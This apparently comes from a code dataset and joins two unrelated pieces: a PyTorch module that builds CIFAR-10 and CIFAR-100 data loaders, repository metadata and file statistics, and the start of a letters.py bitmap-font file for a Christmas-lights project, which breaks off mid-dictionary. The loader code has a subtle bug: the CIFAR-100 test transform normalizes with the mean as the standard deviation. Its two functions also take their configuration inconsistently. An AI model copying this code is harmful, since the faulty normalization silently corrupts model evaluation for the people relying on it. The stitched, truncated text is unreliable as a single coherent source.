43c016ca14a9f5ce7ab59eefe2c41d96df04d151
|
[
"MIT"
] | null | null | null |
import torch
from torchvision import datasets, transforms
from lib.config import cfg
from lib.data.data_util import CIFAR10Policy
def cifar10():
if cfg.ddp.local_rank == 0:
print('Load Dataset :: {}'.format(cfg.dataset.name))
if cfg.dataset.use_aa:
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
CIFAR10Policy(),
transforms.ToTensor(),
transforms.Normalize(
mean=cfg.dataset.mean,
std=cfg.dataset.std
)
])
else:
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(
mean=cfg.dataset.mean,
std=cfg.dataset.std
)
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(
mean=cfg.dataset.mean,
std=cfg.dataset.std
)
])
train_data = datasets.CIFAR10('data', train=True, download=True, transform=transform_train)
test_data = datasets.CIFAR10('data', train=False, transform=transform_test)
if cfg.ddp.distributed:
train_sampler = torch.utils.data.distributed.DistributedSampler(train_data)
test_sampler = torch.utils.data.distributed.DistributedSampler(test_data)
else:
train_sampler = None
test_sampler = None
if cfg.ddp.distributed:
train_loader = torch.utils.data.DataLoader(
train_data,
batch_size=cfg.dataset.batch_size,
sampler=train_sampler,
num_workers=cfg.dataset.workers
)
test_loader = torch.utils.data.DataLoader(
test_data,
batch_size=cfg.dataset.batch_size,
sampler=test_sampler,
num_workers=cfg.dataset.workers
)
else:
train_loader = torch.utils.data.DataLoader(
train_data,
batch_size=cfg.dataset.batch_size,
shuffle=True,
num_workers=cfg.dataset.workers
)
test_loader = torch.utils.data.DataLoader(
test_data,
batch_size=cfg.dataset.batch_size,
shuffle=False,
num_workers=cfg.dataset.workers
)
return [train_loader, test_loader], [train_sampler, test_sampler], 10
def cifar100(cfg):
if cfg.dataset.use_aa:
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
CIFAR10Policy(),
transforms.ToTensor(),
transforms.Normalize(
mean=cfg.dataset.mean,
std=cfg.dataset.std
)
])
else:
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(
mean=cfg.dataset.mean,
std=cfg.dataset.std
)
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(
mean=cfg.dataset.mean,
std=cfg.dataset.mean
),
])
train_data = datasets.CIFAR100('data', train=True, download=True, transform=transform_train)
test_data = datasets.CIFAR100('data', train=False, transform=transform_test)
if cfg.ddp.distributed:
train_sampler = torch.utils.data.distributed.DistributedSampler(train_data)
test_sampler = torch.utils.data.distributed.DistributedSampler(test_data)
else:
train_sampler = None
test_sampler = None
if cfg.ddp.distributed:
train_loader = torch.utils.data.DataLoader(
train_data,
batch_size=cfg.dataset.batch_size,
sampler=train_sampler,
num_workers=cfg.dataset.workers
)
test_loader = torch.utils.data.DataLoader(
test_data,
batch_size=cfg.dataset.batch_size,
sampler=test_sampler,
num_workers=cfg.dataset.workers
)
else:
train_loader = torch.utils.data.DataLoader(
train_data,
batch_size=cfg.dataset.batch_size,
shuffle=True,
num_workers=cfg.dataset.workers
)
test_loader = torch.utils.data.DataLoader(
test_data,
batch_size=cfg.dataset.batch_size,
shuffle=False,
num_workers=cfg.dataset.workers
)
return [train_loader, test_loader], [train_sampler, test_sampler], 100
| 30.903226
| 96
| 0.598747
| 479
| 4,790
| 5.816284
| 0.123173
| 0.111271
| 0.060302
| 0.05743
| 0.9257
| 0.906317
| 0.906317
| 0.906317
| 0.906317
| 0.906317
| 0
| 0.011793
| 0.309603
| 4,790
| 154
| 97
| 31.103896
| 0.830662
| 0
| 0
| 0.783582
| 0
| 0
| 0.007098
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014925
| false
| 0
| 0.029851
| 0
| 0.059701
| 0.007463
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f992fd262d8c7dc30e1fdf9d45501e6cc5b5e55
| 22,976
|
py
|
Python
|
letters.py
|
lemariva/Xmas-lights
|
7a50a6f93e6f97fc195254def401f805b80ecb14
|
[
"Apache-2.0"
] | null | null | null |
letters.py
|
lemariva/Xmas-lights
|
7a50a6f93e6f97fc195254def401f805b80ecb14
|
[
"Apache-2.0"
] | null | null | null |
letters.py
|
lemariva/Xmas-lights
|
7a50a6f93e6f97fc195254def401f805b80ecb14
|
[
"Apache-2.0"
] | null | null | null |
#Copyright [2017] [Mauro Riva <lemariva@mail.com> <lemariva.com>]
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
#The above copyright notice and this permission notice shall be
#included in all copies or substantial portions of the Software.
letters = {"A": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1, 0, 0, 0], [0, 1, 1, 0, 0, 0, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "B": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "C": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "D": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "E": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "F": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 1, 0, 0], [0, 0, 0, 1, 1, 0, 0, 1, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "G": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 0, 1, 1, 1, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "H": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 1, 1, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "I": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "J": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "K": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "L": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "M": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1, 1, 0, 0, 0, 1, 1, 1, 0], [0, 1, 1, 0, 0, 0, 1, 1, 0, 0], [0, 1, 1, 1, 0, 1, 0, 1, 0, 0], [0, 1, 0, 1, 0, 1, 0, 1, 0, 0], [0, 1, 0, 1, 1, 0, 0, 1, 0, 0], [0, 1, 0, 1, 1, 0, 0, 1, 0, 0], [0, 1, 0, 0, 1, 0, 1, 1, 1, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "N": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 0, 0, 0, 0, 0], [0, 0, 1, 0, 1, 1, 0, 0, 0, 0], [0, 0, 1, 0, 0, 1, 1, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "O": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1, 1, 0, 0], [0, 0, 1, 0, 0, 0, 0, 1, 0, 0], [0, 0, 1, 0, 0, 0, 0, 1, 0, 0], [0, 0, 1, 0, 0, 0, 0, 1, 0, 0], [0, 0, 1, 0, 0, 0, 1, 1, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "P": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 0, 1, 1, 0, 0], [0, 0, 0, 1, 1, 0, 1, 1, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "Q": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1, 1, 0, 0], [0, 0, 1, 0, 0, 0, 0, 1, 0, 0], [0, 0, 1, 0, 0, 0, 0, 1, 0, 0], [0, 0, 1, 0, 0, 0, 0, 1, 0, 0], [0, 0, 1, 0, 0, 0, 1, 1, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1, 1, 0, 0]], "R": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "S": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "T": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1, 1, 1, 1, 1, 1, 1, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "U": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "V": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1, 1, 1, 0, 0, 0, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "W": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1, 1, 0, 0, 0, 0, 0, 1, 0], [0, 1, 1, 0, 0, 1, 0, 0, 1, 0], [0, 1, 1, 0, 0, 1, 0, 0, 1, 0], [0, 0, 1, 0, 1, 1, 1, 0, 0, 0], [0, 0, 1, 1, 1, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "X": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 1, 0, 0, 0], [0, 0, 1, 0, 0, 1, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "Y": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "Z": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "0": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "1": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "2": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "3": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "4": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "5": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "6": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 0, 1, 0, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "7": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "8": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "9": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "!": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "\"": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "#": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "$": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 1, 0, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0]], "%": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 